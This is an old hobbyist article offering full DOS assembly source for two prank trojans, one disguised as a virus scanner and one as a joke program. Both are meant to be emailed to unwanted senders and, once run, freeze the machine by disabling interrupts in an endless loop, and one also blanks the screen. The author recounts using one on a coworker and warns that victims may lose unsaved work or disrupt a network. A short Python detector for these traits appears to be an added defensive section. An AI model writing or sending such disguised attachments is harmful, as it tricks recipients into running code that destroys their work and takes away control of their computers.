Pestcontrols
Written by Jan Verhoeven   


Are you plagued now and then by friends and relatives who send you funny pictures (mostly with a lot of "beneath the belt content") via E-mail?


I used to have them. I got rid of these pests.

How did I do it? I sent back some nice programs. And if they run Outlook Express, they can't resist opening the attachment.

What I do is NOT make a virus. It is at best a trojan horse, but in fact it doesn't even come close to a trojan. No harm is done (intentionally) unless the victim is a real moron and starts an unknown executable.

Pestcontrol 1: the virus scanner


Most of the aforementioned morons know of the existence of virus scanners. So they will be more than eager to try out the latest one, especially if it is as compact as this one:

name scan

lf equ 10
cr equ 13

mov dx, offset text
mov ah, 9
int 021 ; show some message

back: cli ; disable keyboard etc
jmp back ; and do it again

mov ax, 04C00 ; by the time pigs can fly, ...
int 021 ; ... the program is halted.

text db 'Scanning your system....', cr, lf
db 'Please wait a minute. $'
db 1023 dup (073)

Yes, you are right, this COM file is something like 1 Kb in size. You can easily control the size by adjusting the value in the last line. Make sure to remain well under the 64K limit, else the file cannot be a COM file anymore and there is a chance that a wraparound will occur in which your main routine will be overwritten.

I hesitate to explain the program. It's so damned simple. In part 1 the message is printed to the screen. In part 2 the computer is crippled and in part 3 the program returns to the command interpreter, only this point is never reached.... :o)

Believe me: people will wait HOURS before they get worried and try to Alt-Ctrl-Del themselves a way out of this problem. Only to find out that their efforts are in vain.
If this program is run from within a DOS box under Windows, and the user has a lot of other tasks open, he will lose any unsaved work. And if he or she is on a network, it may be crippled as well.

So be a little bit careful who you treat to this attachment.....

Pestcontrol 2: something funny


We all like jokes, don't we? So we send each other large-breasted photos and such. I have a joke to send back to these persons. It's a real funny program, believe me. And efficient.

name funny

cli ; disable keyboard and interrupts
cld ; make sure we move upwards
mov ax, 0A000 ; point to start of VGA pixel RAM
mov es, ax
mov ds, ax
L1: cli ; INTs off again, just in case...
mov cx, 08000
mov ax, 0
mov di, ax
mov si, ax
L0: cli ; did I turn off INTs?
lodsw ; fetch word from VGA screen
xor ax, ax ; clear it
stosw ; and store it
loop L0 ; loop back to CLI instruction
cli ; and turn off interrupts
jmp L1 ; before jumping back to the CLI.

db 22K dup ('Í ') ; add some more muscles.

This is a real nasty program. One of the guys at work (two windows away from my place; I could see the results...) had been sending me several 500 Kb funnies. I asked him to remove me from his mailing but he didn't listen. So I shot back (hey, it was self defence!).

The first part of the program kills the keyboard and other interrupts, whereas the second part plays a nasty trick on the user's screen. I assume the user is running Windows on a VGA screen.... It keeps on pumping zeros into display memory in a loop that's almost impossible to stop. If the CPU managed to enable interrupts again, it would lose control after another few nanoseconds (on modern CPUs) or microseconds (on older ones).

The result is devastating: they run the FUNNY.EXE (if there is no MZ in the exe-header, the program is considered a COM file) and the screen turns black immediately and they lose all control of the machine. The three-fingered salute will not help. The only option is to pull the plug.

This executable did the trick. Four requests to relieve me from his mail assaults did not work. One counterattack with my Funny Exe was effective immediately.
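
Seen from the receiving side, the traits described above (an .EXE name without an MZ header, the COM size limit, and a jump that keeps landing on CLI) can all be checked statically before an attachment is opened. The Python check below is an added example, not part of the original article; the function names, the size constant and the sample bytes are assumptions constructed for illustration.

```python
# Added example: triage an attachment the way the DOS loader would see it.
COM_MAX = 0x10000 - 0x100        # assumed limit: 64 KiB segment minus the 256-byte PSP
CLI, STI, JMP_SHORT = 0xFA, 0xFB, 0xEB   # 8086 opcodes

def loader_type(data):
    """DOS decides by signature, not by file extension."""
    return "EXE" if data[:2] in (b"MZ", b"ZM") else "COM"

def cli_loops(data):
    """Offsets of CLI bytes that a short backward jump returns to with no
    STI in between. Heuristic byte scan, not a disassembler."""
    hits = []
    for i in range(len(data) - 1):
        if data[i] != JMP_SHORT:
            continue
        rel = data[i + 1] - 256 if data[i + 1] > 127 else data[i + 1]
        target = i + 2 + rel     # displacement is relative to the next instruction
        if rel < 0 and 0 <= target < i and data[target] == CLI \
                and STI not in data[target:i]:
            hits.append(target)
    return hits

def triage(name, data):
    """Return a list of human-readable findings for one attachment."""
    findings = []
    kind = loader_type(data)
    ext = name.rsplit(".", 1)[-1].upper() if "." in name else ""
    if ext == "EXE" and kind == "COM":
        findings.append("named .EXE but no MZ header: runs as a COM image")
    if kind == "COM" and len(data) > COM_MAX:
        findings.append("too large for a single-segment COM image")
    for off in cli_loops(data):
        findings.append(f"interrupts-off loop at offset {off:#x}")
    return findings

# Constructed sample: message text, then CLI / JMP SHORT -3, then padding.
SAMPLE = b"Please wait$" + bytes([CLI, JMP_SHORT, 0xFD]) + b"s" * 64

if __name__ == "__main__":
    for finding in triage("FUNNY.EXE", SAMPLE):
        print(finding)
```

Because the loop check matches raw bytes, it can also fire on data that happens to contain the same values, so treat a hit as a reason to inspect the file rather than as a verdict.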

Afterthoughts


Yes, these programs are nasties. They should NOT be copied or used too soon. On the other hand, Windows is so clumsily programmed (there should be IO Privileges on task switching instructions like IN, OUT and CLI but there aren't) that it enables malicious software to cause the effects they do.

Reminder


The code published here is GNU GPL. Don't try this at home.